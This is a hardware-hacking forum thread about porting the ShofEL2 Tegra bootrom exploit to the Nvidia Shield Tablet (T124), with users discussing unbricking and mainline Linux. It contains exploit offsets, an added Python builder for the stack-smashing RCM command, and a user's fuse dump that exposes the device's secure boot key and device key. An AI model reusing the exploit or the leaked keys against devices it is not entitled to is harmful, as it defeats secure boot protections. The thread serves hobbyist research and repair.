With all this in mind max RCM cmd length is 0x32274 bytes.
Since the exploit uses USB buffer 2, only 0x31000 bytes can be used for the payload in order to avoid finishing the RCM cmd.
A payload can still be loaded using the same path as the one used by the original shofEL2, since no validation is carried out till the whole payload is received.
Even if the specs say that JTAG is enabled by default, the cold bootrom code disables it while it is running (not as dumb as expected).
RCM runs on an ARM7TDMI core; I managed to halt the CPU in U-Boot using a Segger J-Link.
When the poisoned GET_STATUS is executed, 0x30C bytes will be copied before the payload. These bytes are part of the execution stack, starting with the USB status var.
Using the original sanity_check function from ShofEL2, I got from the execution stack that the RCM USB buffers are located at 0x40004000 and 0x40008000.
Two USB buffers of 0x1000 bytes are still present. They still alternate on each USB txn. An odd number of USB txns will leave you on the high buffer for the next txn.
Using the original sanity_check function from ShofEL2, I got from the execution stack that the memcpy return address is located at 0x4000DCD8 (0x4000DCF4 - 0xC - 2 * 4 - 2 * 4).
The position in the RCM cmd where the entry address needs to be written to smash the memcpy return address is calculated as follows:
n_bytes_to_copy = 0x4000DCD8 - 0x40008000 (memcpy_ret_add_loc - usb_buf2_add) -> n_bytes_to_copy = 0x5CD8 bytes
pos_in_payload = n_bytes_to_copy - 0x30C (copied from the execution stack) - 0x4 -> pos_in_payload = 0x59C8
pos_in_rcm_cmd = pos_in_payload + 0x284 (header length) -> pos_in_rcm_cmd = 0x5C4C
I found the following functions in the bootrom:
void ep1_in_write_imm(void *buffer, u32 size, u32 *num_xfer) -> 0x001065C0 -> Writes EP1_IN
void ep1_out_read_imm(void *buffer, u32 size, u32 *num_xfer) -> 0x00106612 -> Reads EP1_OUT
void do_bct_boot() -> 0x00100624 -> Boots BCT without applying locks.
Source: https://github.com/LordRafa/ShofEL2-for-T124/releases
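The following Python is an added example, not code from the post or from the ShofEL2-for-T124 repository. It reproduces the length constraints and the return-address offset arithmetic from the "Interesting facts" list above and lays the RCM command out accordingly. It does not talk to the device; it assumes a little-endian length word in the header (as in the X1 tooling), that transfer counting starts in the low USB buffer, and that a Thumb entry is signalled by setting bit 0 of the entry address. The stand-in payload is constructed.

```python
"""RCM command layout for the T124 ShofEL2 port, reproducing the arithmetic
from the "Interesting facts" list. Added example; constants not stated in the
post are marked as assumptions."""
import struct

RCM_HDR_LEN = 0x284          # T124 header length; first 4 bytes hold the cmd length
RCM_MIN_LEN = 0x1004         # bootrom minimum is 0x404, but the first bulk transfer is 0x1000
RCM_MAX_LEN = 0x32274        # maximum stated in the post
USB_XFER_LEN = 0x1000        # one bulk transfer fills one whole USB buffer
USB_BUF1 = 0x40004000        # low USB buffer
USB_BUF2 = 0x40008000        # high USB buffer, the one the exploit overflows from
STACK_COPY_LEN = 0x30C       # stack bytes copied ahead of the payload by the poisoned GET_STATUS
MEMCPY_RET_LOC = 0x4000DCD8  # where memcpy's return address lives on the stack
PAYLOAD_LOAD = 0x4000E000    # RCM loads the payload here in IRAM


def check_cmd_len(n):
    """Return the constraints an RCM cmd length violates (empty list = acceptable)."""
    errs = []
    if n < RCM_MIN_LEN:
        errs.append("shorter than 0x1004")
    if (n - RCM_HDR_LEN) % 0x10:
        errs.append("length - 0x284 is not a multiple of 0x10 (length must end in 4)")
    if n > RCM_MAX_LEN:
        errs.append("longer than 0x32274, payload would not fit in IRAM")
    return errs


def pad_cmd_len(n):
    """Smallest length >= n that satisfies the minimum and the end-in-4 rule
    (the caller still has to respect the maximum)."""
    n = max(n, RCM_MIN_LEN)
    rem = (n - RCM_HDR_LEN) % 0x10
    return n + (0x10 - rem) if rem else n


def smash_offsets():
    """(bytes memcpy has to copy, offset in payload, offset in RCM cmd) of the
    word that lands on memcpy's saved return address."""
    n_bytes_to_copy = MEMCPY_RET_LOC - USB_BUF2
    pos_in_payload = n_bytes_to_copy - STACK_COPY_LEN - 4
    pos_in_rcm_cmd = pos_in_payload + RCM_HDR_LEN
    return n_bytes_to_copy, pos_in_payload, pos_in_rcm_cmd


def transfer_buffers(cmd_len):
    """USB buffer each 0x1000-byte transfer of a cmd_len-byte command lands in.
    Assumption: the first transfer goes to the low buffer and they alternate,
    so an odd number of completed transfers leaves the next one on the high buffer."""
    n_xfers = -(-cmd_len // USB_XFER_LEN)   # ceiling division
    return [USB_BUF1 if i % 2 == 0 else USB_BUF2 for i in range(n_xfers)]


def build_rcm_cmd(payload, entry=PAYLOAD_LOAD, thumb=True):
    """Assemble the RCM command bytes: a 0x284-byte header whose first word is
    the total length, then the payload with the entry address planted at
    pos_in_rcm_cmd. Bit 0 of the entry address is set for Thumb entry."""
    _, pos_in_payload, _ = smash_offsets()
    body = bytearray(payload)
    if len(body) < pos_in_payload + 4:
        body.extend(b"\0" * (pos_in_payload + 4 - len(body)))   # the smash slot must lie inside the cmd
    total = pad_cmd_len(RCM_HDR_LEN + len(body))
    body.extend(b"\0" * (total - RCM_HDR_LEN - len(body)))
    entry_word = (entry | 1) if thumb else entry
    struct.pack_into("<I", body, pos_in_payload, entry_word)
    cmd = struct.pack("<I", total) + b"\0" * (RCM_HDR_LEN - 4) + bytes(body)
    errs = check_cmd_len(len(cmd))
    if errs:
        raise ValueError("; ".join(errs))
    return cmd


if __name__ == "__main__":
    n, pp, pc = smash_offsets()
    print(f"memcpy copies 0x{n:X} bytes; entry word at payload+0x{pp:X} = cmd+0x{pc:X}")
    cmd = build_rcm_cmd(b"\x00\xbf" * 8)   # constructed stand-in payload: eight Thumb NOPs
    print(f"cmd length 0x{len(cmd):X}, last transfer lands in 0x{transfer_buffers(len(cmd))[-1]:X}")
```

With the numbers from the post this yields 0x5CD8 bytes to copy, the entry word at payload offset 0x59C8, i.e. RCM cmd offset 0x5C4C, and a command of 0x5C54 bytes whose sixth (and last) transfer lands in the high buffer, which is the buffer the post says the overflow is taken from.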
Great work! Does this mean you could in theory push payloads made for the switch to the K1, as they are both tegra-based devices?
xdpirate said:
Great work! Does this mean you could in theory push payloads made for the switch to the K1, as they are both tegra-based devices?
Well, yes, that is partially right, but bear in mind that these payloads sometimes rely on the Switch peripherals, so for example if you want to show something on the LCD it will not work, because the Shield and Switch LCD controllers aren't the same: the code will run on the boot CPU but the LCD will not work, because they don't work in the same way... It is something like using the wrong driver for a device.
Also you need to understand that the payloads are normally used as a first-stage loader for something else; if that something else is written for the Switch app CPU it will not work at all. The Switch Tegra app CPU is an arm64 CPU and the Shield app CPU is a 32-bit armv7, so they are not compatible. E.g. this is why I cannot run the Switch Linux directly on my Shield... and even if they could work, again you will find the problem of the peripherals and many other things customized for Nintendo... that is why a Shield TV is not a Switch... same same... but different.
This can be more useful to those people who are interested in doing some research around this device.
Is it possible to unbrick a Shield Tablet killed with this ?
Tonio1987french said:
Is it possible to unbrick a Shield Tablet killed with this ?
With some additional development I think that it could be possible. Unfortunately I don't have a killed device to work on this.
Someone who would like to work on this would need to check where the kill switch is enabled and where it is verified.
If I understand correctly, this would be the boot chain: bootrom -> nvtboot (boot CPU code) -> nvtboot (app CPU code) -> second-stage bootloader (uboot/fastboot???) -> Android.
I would be tempted to think that nvtboot on the boot CPU is responsible for checking if the kill switch has been enabled, or maybe the kill switch just modifies the BCT header to break the boot chain... If I am right, then maybe it would be possible to use ShofEL2 to restore a backup to the eMMC.
A payload would still need to be developed to be able to read/write the eMMC using ShofEL2. This is something that I am considering implementing as part of the work porting mainline Linux.
Also it would be nice to see if all devices share the same private key; that would be great, because anyone could read a working Shield eMMC and share it to restore a killed one... if anyone could share the fuse dump that my ShofEL2 generates, I could answer this question....
Anyway, I would require a killed switch to be able to work on this... My main focus now is running mainline Linux....
Lord_Rafa said:
With some additional development I think that it could be possible. Unfortunately I don't have a killed device to work on this.
Someone who would like to work on this would need to check where the kill switch is enabled and where it is verified.
If I understand correctly, this would be the boot chain: bootrom -> nvtboot (boot CPU code) -> nvtboot (app CPU code) -> second-stage bootloader (uboot/fastboot???) -> Android.
I would be tempted to think that nvtboot on the boot CPU is responsible for checking if the kill switch has been enabled, or maybe the kill switch just modifies the BCT header to break the boot chain... If I am right, then maybe it would be possible to use ShofEL2 to restore a backup to the eMMC.
A payload would still need to be developed to be able to read/write the eMMC using ShofEL2. This is something that I am considering implementing as part of the work porting mainline Linux.
Also it would be nice to see if all devices share the same private key; that would be great, because anyone could read a working Shield eMMC and share it to restore a killed one... if anyone could share the fuse dump that my ShofEL2 generates, I could answer this question....
Anyway, I would require a killed switch to be able to work on this... My main focus now is running mainline Linux....
I do have a killed Shield Tablet LTE. Where are you from?
The OTA that kills the tablet has been dissected here: https://forum.xda-developers.com/shield-tablet/general/kill-kill-switch-shield-tablet-xx-t3179489
Once flashed the tablet doesn't give any signs of life, and goes only in APX mode when connected:
Is it possible to use ShofEL2 in APX mode? I don't think so?
Gave a quick try compiling crosstool-ng on Debian 8 but it's hanging at make, will have a look at it later.
On a side note, one user (Drims75) from Ukraine restores motherboards for a modest cost; you can find a couple of users who sent their motherboard to him: https://forum.xda-developers.com/showpost.php?p=71516196&postcount=139
Thanks for your work!
I can confirm the exploit is working.
Thanks so much LordRafa, you're a legend!
How do I get the SBK key? Is the FUSE_PRIVATE_KEY I get via READ_FUSES the SBK? And is it possible to dump the BIS keys? The biskeydump payload seems to only work for the Switch. Does anyone have a biskeydump payload for the T124?
This is absolutely awesome.
I have a bricked shield tablet, here is the output from the fuses:
Waiting T124 to enter RCM mode (ctrl-c to cancel). Note: root permission could be required.
K1 in RCM mode connected.
Chip ID: 0x40 0x02 0x07 0x01 0x00 0x00 0x00 0x10 0x09 0xa1 0x0c 0x74 0x01 0x10 0x00 0x64
Hacky Get Status returned error... Probably the stack got smashed, Congrats
Dumping 768 bytes from 0x7000f900.
FUSE_PRODUCTION_MODE: 00000001
FUSE_JTAG_SECUREID_VALID: 00000001
FUSE_ODM_LOCK: 00000006
FUSE_OPT_OPENGL_EN: 00000001
FUSE_SKU_INFO: 0000001f
FUSE_CPU_SPEEDO_0_CALIB: 000008cd
FUSE_CPU_IDDQ_CALIB: 0000030f
RESERVED_0x01C: 00000000
RESERVED_0x020: 00000000
RESERVED_0x024: 00000000
FUSE_OPT_FT_REV: 00000022
FUSE_CPU_SPEEDO_1_CALIB: 00000000
FUSE_CPU_SPEEDO_2_CALIB: 000007fe
FUSE_SOC_SPEEDO_0_CALIB: 0000089f
FUSE_SOC_SPEEDO_1_CALIB: 00000000
FUSE_SOC_SPEEDO_2_CALIB: 00000000
FUSE_SOC_IDDQ_CALIB: 0000025f
RESERVED_0x044: 00000000
FUSE_FA: 00000000
FUSE_RESERVED_PRODUCTION: 00000002
FUSE_HDMI_LANE0_CALIB: 00000000
FUSE_HDMI_LANE1_CALIB: 00000000
FUSE_HDMI_LANE2_CALIB: 00000000
FUSE_HDMI_LANE3_CALIB: 00000000
FUSE_ENCRYPTION_RATE: 00000000
FUSE_PUBLIC_KEY 0-3: bc420312 298f5d3c a5abe328 9e556001
FUSE_PUBLIC_KEY 4-7: 0eefbfaa 756a7b0f b7507e2f 149672c4
FUSE_TSENSOR1_CALIB: 03a27cbb
FUSE_TSENSOR2_CALIB: 03ee9ee6
RESERVED_0x08C: 00000000
FUSE_OPT_CP_REV: 00000022
FUSE_OPT_PFG: 00000000
FUSE_TSENSOR0_CALIB: 0053a324
FUSE_BOOTROM_PATCH_SIZE: 00000002
FUSE_SECURITY_MODE: 00000001
FUSE_PRIVATE_KEY: 5f244a57 d0197865 940f80a3 15484c8f
FUSE_DEVICE_KEY: 5e65bbde
FUSE_ARM_DEBUG_DIS: 00000000
FUSE_BOOT_DEVICE_INFO: 00000000
FUSE_RESERVED_SW: 00000000
FUSE_VP8_ENABLE: 00000001
FUSE_RESERVED_ODM 0-3: 00000000 00007090 0000000b 00000000
FUSE_RESERVED_ODM 4-7: 00000000 00000000 00000000 00000000
FUSE_OBS_DIS: 00000000
RESERVED_0x0EC: 00000000
FUSE_USB_CALIB: 02c6038b
FUSE_SKU_DIRECT_CONFIG: 00000000
FUSE_KFUSE_PRIVKEY_CTRL: 00000003
FUSE_PACKAGE_INFO: 00000004
FUSE_OPT_VENDOR_CODE: 00000000
FUSE_OPT_FAB_CODE: 00000000
FUSE_OPT_LOT_CODE_0: 00000000
FUSE_OPT_LOT_CODE_1: 00000000
FUSE_OPT_WAFER_ID: 00000000
FUSE_OPT_X_COORDINATE: 00000000
FUSE_OPT_Y_COORDINATE: 00000000
FUSE_OPT_SEC_DEBUG_EN: 00000000
FUSE_OPT_OPS_RESERVED: 00000000
FUSE_SATA_CALIB: 00000000
FUSE_GPU_IDDQ_CALIB: 0000036e
FUSE_TSENSOR3_CALIB: 03e21f59
FUSE_SKU_BOND_OUT_L: 00000000
FUSE_SKU_BOND_OUT_H: 00000000
FUSE_SKU_BOND_OUT_U: 00000000
FUSE_SKU_BOND_OUT_V: 00000000
FUSE_SKU_BOND_OUT_W: 00000000
RESERVED_0x144: 00000000
FUSE_OPT_SUBREVISION: 00000000
FUSE_OPT_SW_RESERVED_0: 00000000
FUSE_OPT_SW_RESERVED_1: 00000000
FUSE_TSENSOR4_CALIB: 03b41d91
FUSE_TSENSOR5_CALIB: 0024c106
FUSE_TSENSOR6_CALIB: 03f15f1c
FUSE_TSENSOR7_CALIB: 00788335
FUSE_OPT_PRIV_SEC_EN: 00000000
FUSE_PKC_DISABLE: 00000000
RESERVED_0x16C: 00000000
RESERVED_0x170: 00000000
RESERVED_0x174: 00000000
RESERVED_0x178: 00000000
FUSE_FUSE2TSEC_DEBUG_DISABLE: 00000001
FUSE_TSENSOR8_CALIB: 00173ab1
FUSE_OPT_CP_BIN: 00000003
FUSE_OPT_GPU_FS: 00000000
FUSE_OPT_FT_BIN: 00000001
RESERVED_0x190: 00000000
FUSE_SKU_BOND_OUT_X: 00000000
FUSE_APB2JTAG_DISABLE: 00000000
RESERVED_0x19C: 00000000
FUSE_PHY_FLOORSWEEP: 00000000
FUSE_PHY_FLOOR_ENABLE: 00000000
FUSE_ARM_CRYPT_DE_FEATURE: 00000000
FUSE_DENVER_MTS_DE_FEATURE: 00000000
FUSE_DIE_VERSION_OVERRIDE: 00000000
FUSE_TRIMMERS: 00000000
FUSE_DENVER_BOOT_SEC: 00000000
FUSE_DENVER_DFD_ACCESS: 00000000
FUSE_WOA_SKU_FLAG: 00000000
FUSE_ECO_RESERVE_1: 00000000
FUSE_GCPLEX_CONFIG_FUSE: 00000002
RESERVED_0x1CC: 00000000
RESERVED_0x1D0: 00000000
RESERVED_0x1D4: 00000000
RESERVED_0x1D8: 00000000
RESERVED_0x1DC: 00000000
RESERVED_0x1E0: 00000000
RESERVED_0x1E4: 00000000
RESERVED_0x1E8: 00000000
RESERVED_0x1EC: 00000000
RESERVED_0x1F0: 00000000
RESERVED_0x1F4: 00000000
RESERVED_0x1F8: 00000000
FUSE_SPARE_REALIGNMENT_REG: 00000000
FUSE_SPARE_BITS 00-03: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 04-07: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 08-11: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 12-15: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 16-19: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 20-23: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 24-27: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 28-31: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 32-35: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 36-39: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 40-43: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 44-47: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 48-51: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 52-55: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 56-59: 00000000 00000000 00000000 00000000
FUSE_SPARE_BITS 60-63: 00000000 00000000 00000000 00000000
Lord_Rafa said:
With some additional development I think that it could be possible. Unfortunately I don't have a killed device to work on this.
Someone who would like to work on this would need to check where the kill switch is enabled and where it is verified.
If I understand correctly, this would be the boot chain: bootrom -> nvtboot (boot CPU code) -> nvtboot (app CPU code) -> second-stage bootloader (uboot/fastboot???) -> Android.
I would be tempted to think that nvtboot on the boot CPU is responsible for checking if the kill switch has been enabled, or maybe the kill switch just modifies the BCT header to break the boot chain... If I am right, then maybe it would be possible to use ShofEL2 to restore a backup to the eMMC.
A payload would still need to be developed to be able to read/write the eMMC using ShofEL2. This is something that I am considering implementing as part of the work porting mainline Linux.
Also it would be nice to see if all devices share the same private key; that would be great, because anyone could read a working Shield eMMC and share it to restore a killed one... if anyone could share the fuse dump that my ShofEL2 generates, I could answer this question....
Anyway, I would require a killed switch to be able to work on this... My main focus now is running mainline Linux....
Did you have any success running/porting mainline linux?
Would this dump the key required to nvflash u-boot?
Edit: I think I understand enough now to know why this is a dumb question. One would use tegrarcm, not nvflash.
Fuses - Nintendo Switch Brew (switchbrew.org)
Edit: From NVidia's bct-overview:
When a chip has an RSA public key (PKC) programmed into its flash, it expects the BCT to contain RSA-PSS signatures created/validated using that key pair. When a chip has an AES key (SBK; Secure Boot Key) programmed into its flash, it expects the BCT to contain AES-CMAC hashes created/validated using that key.
Has anyone done any testing around what that means for devices with both PKC and SBK? As in does it validate both, either or a does one take precedence over the other?
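As an added example (not part of any post or of the ShofEL2-for-T124 tool), the following Python parses the READ_FUSES output format shown in the dump above, pulls out the secure-boot fuses, and compares two dumps, which is the check Lord_Rafa asked for when wondering whether all devices share the same private key, and it lists which BCT authentication mechanism the quoted NVIDIA bct-overview text ties to each burned key. The interpretation is an assumption taken from the fuse names and that quote: the four-word FUSE_PRIVATE_KEY is treated as the 128-bit SBK, the eight-word FUSE_PUBLIC_KEY as the 256-bit PKC key hash, and FUSE_PKC_DISABLE at face value. The first sample is a subset of lines copied from the dump posted above; the second is constructed and not from any real device. It does not settle the precedence question asked in the last post.

```python
"""Parse READ_FUSES output from the T124 ShofEL2 port and pull out the
secure-boot fuses. Added example, not part of the tool. Fuse meanings are
assumptions taken from the fuse names and the NVIDIA bct-overview text
quoted in the thread."""
import re

# Security-relevant lines copied from the READ_FUSES dump posted in the thread.
DUMP_BRICKED_TABLET = """\
FUSE_PRODUCTION_MODE: 00000001
FUSE_ODM_LOCK: 00000006
FUSE_PUBLIC_KEY 0-3: bc420312 298f5d3c a5abe328 9e556001
FUSE_PUBLIC_KEY 4-7: 0eefbfaa 756a7b0f b7507e2f 149672c4
FUSE_SECURITY_MODE: 00000001
FUSE_PRIVATE_KEY: 5f244a57 d0197865 940f80a3 15484c8f
FUSE_DEVICE_KEY: 5e65bbde
FUSE_ARM_DEBUG_DIS: 00000000
FUSE_OPT_SEC_DEBUG_EN: 00000000
FUSE_PKC_DISABLE: 00000000
"""

# Constructed second dump (not from a real device): same PKC hash, different SBK
# and device key, plus the non-fuse lines the tool prints before the fuses.
DUMP_CONSTRUCTED = """\
K1 in RCM mode connected.
Chip ID: 0x40 0x02 0x07 0x01 0x00 0x00 0x00 0x10 0x09 0xa1 0x0c 0x74 0x01 0x10 0x00 0x64
FUSE_PRODUCTION_MODE: 00000001
FUSE_PUBLIC_KEY 0-3: bc420312 298f5d3c a5abe328 9e556001
FUSE_PUBLIC_KEY 4-7: 0eefbfaa 756a7b0f b7507e2f 149672c4
FUSE_SECURITY_MODE: 00000001
FUSE_PRIVATE_KEY: 00112233 44556677 8899aabb ccddeeff
FUSE_DEVICE_KEY: 01234567
FUSE_PKC_DISABLE: 00000000
FUSE_SPARE_BITS 00-03: 00000000 00000000 00000000 00000000
"""

# name, optional "lo-hi" word range, colon, one or more 8-hex-digit words
LINE_RE = re.compile(r"^([A-Za-z0-9_]+)(?:\s+\d+-\d+)?:\s*((?:[0-9a-f]{8}\s*)+)$")


def parse_fuses(text):
    """Map fuse name -> list of 32-bit words. Rows split across lines
    ('FUSE_PUBLIC_KEY 0-3' and '4-7') are concatenated in dump order;
    lines that are not fuses (chip ID, status messages) are skipped."""
    fuses = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            fuses.setdefault(m.group(1), []).extend(int(w, 16) for w in m.group(2).split())
    return fuses


def key_hex(fuses, name):
    """Concatenate a multi-word fuse into one hex string ('' if absent)."""
    return "".join(f"{w:08x}" for w in fuses.get(name, []))


def word(fuses, name):
    return fuses.get(name, [0])[0]


def security_summary(fuses):
    return {
        "production_mode": word(fuses, "FUSE_PRODUCTION_MODE") == 1,
        "security_mode": word(fuses, "FUSE_SECURITY_MODE") == 1,
        "pkc_hash_burned": any(fuses.get("FUSE_PUBLIC_KEY", [])),   # assumption: 256-bit PKC key hash
        "pkc_disabled": word(fuses, "FUSE_PKC_DISABLE") == 1,        # assumption: name taken at face value
        "sbk_burned": any(fuses.get("FUSE_PRIVATE_KEY", [])),        # assumption: 128-bit SBK
        "arm_debug_disabled": word(fuses, "FUSE_ARM_DEBUG_DIS") == 1,
    }


def bct_auth_candidates(summary):
    """Per the quoted NVIDIA text: a burned PKC means an RSA-PSS signed BCT, a
    burned SBK means AES-CMAC. With both burned the thread leaves precedence
    open, so both are listed rather than one picked."""
    out = []
    if summary["pkc_hash_burned"] and not summary["pkc_disabled"]:
        out.append("RSA-PSS signature (PKC)")
    if summary["sbk_burned"]:
        out.append("AES-CMAC (SBK)")
    return out


def compare_keys(fa, fb):
    """Do two devices share the PKC hash, the SBK and the device key?"""
    pairs = (("pkc_hash", "FUSE_PUBLIC_KEY"), ("sbk", "FUSE_PRIVATE_KEY"), ("device_key", "FUSE_DEVICE_KEY"))
    return {label: key_hex(fa, name) == key_hex(fb, name) for label, name in pairs}


if __name__ == "__main__":
    a, b = parse_fuses(DUMP_BRICKED_TABLET), parse_fuses(DUMP_CONSTRUCTED)
    print(security_summary(a))
    print(bct_auth_candidates(security_summary(a)))
    print(compare_keys(a, b))
```

Run on the dump above it reports production and security mode set, a PKC hash burned and not disabled, and an SBK burned, so both mechanisms are listed; the comparison with the constructed dump returns a shared PKC hash but different SBK and device key, which is exactly the per-device question a second real dump would answer.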